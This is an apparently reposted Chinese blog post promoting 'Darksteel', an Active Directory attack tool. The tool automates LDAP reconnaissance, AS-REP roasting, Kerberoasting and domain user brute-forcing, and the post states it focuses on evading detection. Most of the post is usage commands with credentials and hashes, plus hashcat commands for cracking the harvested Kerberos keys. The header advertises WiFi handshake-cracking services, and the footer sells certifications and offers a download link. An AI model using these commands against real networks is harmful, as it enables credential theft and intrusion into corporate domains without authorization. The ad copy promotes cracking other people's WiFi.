2.0.1!域内自动化信息收集利用工具

在线wifi跑包 金刚包跑包 cap跑包 hccapx ewsa在线 就来 握手包跑包

各位好 又见面了 我是曹操 今天给大家带来一篇新的教程

希望各位细心学习 低调用网

darksteel.exe ldap -d dc.domain.com -n domain.com -m computer ____    ______  ____    __  __   ____    ______  ____    ____    __/  _` /  _  /  _` / /  /  _` /__  _/  _` /  _` /   /   L   L   /'/' ,L_/_/ /  L_  L_         __   ,  /  , <  /___         _L   _L    _  _   /   \ \  \`  / L       L   L   L  ____/ _ _ _ _ _ _\ `____  _  ____/ ____/ ____//___/  /_//_//_// //_//_/ /_____/  /_/  /___/  /___/  /___/
v2.0.0
[*] Domain Computers:WIN-KQH5FQSIJSHDESKTOP-AO8D722DESKTOP-DO7D913WIN-7UI852PLEXCHANGESERVER

声明:本文介绍的安全工具和项目均来源于网络,仅供安全研究和学习使用。如果用于其他目的,使用者需自行承担法律责任,与工具作者和本公众号无关。为了提供更好的阅读体验,现在只对常读和星标的公众号展示大图推送。建议将Hack分享吧设为星标,以免错过内容!以下是一个工具的介绍。

Darksteel是一款用于域内自动化信息搜集和利用的工具。在渗透测试中,单独搜集域内信息往往繁琐,而漏洞利用也需要使用多个工具。因此,Darksteel项目的目标是解决域内信息搜集和漏洞利用的问题。该项目主要注重规避检测,暂未包含直接对域控进行攻击的利用。后续可能会添加绕过检测的利用方法。

功能演示:

  • 可以使用本地账号进行认证查询,无需填写账号密码(-d参数需要填写域名)。
ldap当我们拥有一个域内账号密码(hash),可以通过ldap进行搜集域内有用信息,如spn、委派、存活计算机等等信息,为域渗透进行准备
kerberos针对kerberos漏洞进行利用
blast爆破域用户
computerip批量查询域内计算机对应的ip
 ____    ______  ____    __  __   ____    ______  ____    ____    __/  _` /  _  /  _` / /  /  _` /__  _/  _` /  _` /   /   L   L   /'/' ,L_/_/ /  L_  L_          __   ,  /  , <  /___         _L   _L    _    _   /   \ \  \`  / L       L   L   L     ____/ _ _ _ _ _ _\ `____  _  ____/ ____/ ____/    /___/  /_//_//_// //_//_/ /_____/  /_/  /___/  /___/  /___/
v2.0.0
自动化域内信息搜集、kerberos利用工具
Usage: darksteel [command]
Available Commands: blast 爆破域内用户 completion Generate the autocompletion script for the specified shell computerip 查询域内计算机的ip地址 help Help about any command kerberos kerberos利用 ldap ldap查询
Flags: -d, --dc string 域控地址 -n, --domain string 域名 -h, --help help for darksteel
Use "darksteel [command] --help" for more information about a command.
darksteel.exe ldap -n test.com -d 192.168.1.1 -u user -p password(hash) -a
darksteel.exe ldap -n test.com -d 192.168.1.1 -u user -p password(hash) -z 管理员

主要功能:

使用实例:

LDAP:

  1. 当我们拥有一个域内账号密码(hash)时,可以通过LDAP搜集域内有用信息,如SPN、委派、存活计算机等,为域渗透做准备。

  2. 当我们想要查找域内某些关键字对应的用户或计算机时,可以使用关键字查询,找到管理员用户和管理员计算机。

darksteel.exe ldap -n test.com -d 192.168.1.1 -u user -p password(hash) -f "(objectClass=Computer)" -t cn,dNSHostName
darksteel.exe kerberos -m asreproast -d 192.168.1.1 -n test.com -u user -p password(hash)
  1. 如果工具内没有提供所需查询内容,也可以使用LDAP语法进行查询。

Kerberos:

  1. 利用Kerberos可以在不需要域认证的情况下获取用户密钥,可以选择输出hashcat或john爆破格式(默认为hashcat)。爆破出来的密码即为该用户的密码。如果不指定目标用户,则需要一个域用户账号密码进行LDAP查询并输出所有可利用密钥。hashcat爆破命令:hashcat -m 18200 hash.txt pass.txt –force。
darksteel.exe kerberos -m asreproast -d 192.168.1.1 -n test.com -t zz
darksteel.exe kerberos -m kerberoast -d 192.168.1.1 -n test.com -u user -p password(hash)
  1. 指定目标用户时,无需域用户认证。

  2. 如果目标用户设置了SPN,则可以输出密钥,可选择输出hashcat或john爆破格式(默认为hashcat)。爆破出来的密码即为该用户的密码。如果不指定目标用户,则需要一个域用户账号密码进行LDAP查询并输出所有可利用密钥。hashcat爆破命令:hashcat -m 13100 hash.txt pass.txt –force。

hashcat工具怎么使用

……

下载地址:请点击下方名片进入公众号,回复关键字【230908】获取下载链接。

信安考证:如果您需要考取各类安全证书,请联系我。价格优惠,组团更便宜,还赠送【潇湘信安】知识星球1年!可提供的证书包括CISP、PTE、PTS、DSG、IRE、IRS、NISP、PMP、CCSK、CISSP、ISO27001等。

赞(0)